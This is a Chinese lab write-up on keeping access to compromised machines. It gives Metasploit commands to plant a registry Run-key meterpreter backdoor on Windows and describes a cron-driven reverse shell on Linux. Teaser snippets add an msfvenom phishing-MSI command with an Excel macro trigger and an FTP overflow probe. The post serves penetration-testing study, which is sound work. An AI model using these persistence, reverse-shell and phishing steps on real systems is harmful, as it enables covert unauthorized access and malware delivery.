权限维持技术
这篇文章是在做网络渗透测试技术实验的时候写的,主要是以学习为目的
其中也还有很多的不足之处
windows 权限维持 注册后门
在获得shell后background退出
选择注册表后门模块
1 | use exploit/windows/local/persistence |
然后选择好攻击模块设置参数,攻击机IP和端口,还有设置会话
1 | set payload windows/x64/meterpreter/reverse_tcp //这句可以不写,因为默认攻击模块就是这个 |
在靶机的对应目录下找到了vbs文件
目录:C:\Users\win7\AppData\Local\Temp\
win+r打开运行输入regedit回车即可打开注册表
然后在KCU\Software\Microsoft\Windows\CurrentVersion\Run下即可看到注册表也成功写入
回到攻击机设置msf,让两个红框的内容一致,执行run之后,重启靶机,即可发现,在登录了靶机之后msf自动上线成功
1 | use multi/handler |
linux权限维持 计划任务反弹shell
使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹
(下面是以Ubuntu18.04为例)
1.服务开启
service cron start
2.编辑计划任务
crontab -e -u 用户名
3.查看计划任务
crontab -l -u 用户名
4.删除计划任务:
crontab -r -u 用户名
创建反弹shell脚本,vim shell.sh
里面的 ip和端口号要和攻击机对应
保存后还要更改文件的权限
然后添加计划任务,需要root权限
vim /etc/crontab
设置反弹shell任务每分钟执行一次
要设置好文件的绝对路径
kali使用nc启动监听,即可监听到shell
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Crzliang!
相关推荐
2023-12-04
应急响应技术
Linux 入侵查杀使用history可以看到历史运行命令,从第22到25条命令可以看到在桌面有一个shell.sh的文件 把文件提取出来,然后使用微步云在线沙箱进行查杀分析 检测出有反弹shell的行为 世界杀毒网并没有检测出来 然后排查ssh日志,我的机器上没有发现异常日志Ubuntu的ssh日志是在记录在/var/log/auth.log里面的 Windows...
2023-12-02
社会工程学钓鱼样本的制作
excel 宏输入下列命令后,即可在目录下看到生成的msi 1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.129 lport=1234 -f msi -o diaoyu.msi 然后启动msf,使用multi/handler模块,并设置好对应的payload,然后输入run,进行监听然后启动python的http服务,是为了后续制作宏的时候提供有网络服务在自己的电脑上创建一个excel表格(实际情况下,文件名要符合实际,有吸引力,里面的内容最好也是真实的,这里因为是实验环境,所以数据都是捏造的)然后插入宏表打开浏览器输入kali的ip地址,看到下图后右键diaoyu.msi,选择复制链接地址然后在表格第一行输入=EXEC(“msiexec /q /i...
2023-12-05
Freefloat FTP Server1.0 溢出漏洞复现
分析漏洞在xp靶机上开启FTPServer 在kali上连接ftp,直接输入aaa/aaa即可进行登录,可以登陆成功,即该服务器并没有对用户进行限制 利用python生成一百个’a’登录,报错了 wireshark抓包得知,只发送出去了78个a 同时发送了100个a也没令软件崩溃,所以改用其他方法 使用脚本测试python发包测试 12345from pwn import *p = remote("192.168.100.143", 21)payload = 'A'*500p.sendline(payload)p.interactive() 程序崩溃了此时eip指向了0x41414141,从发送的数据’A’的ascii码是0x41得知,USER输入点存在栈溢出漏洞进一步的验证分析就不进行了,网上有更详细的分析过程 漏洞利用寻找jmp...
评论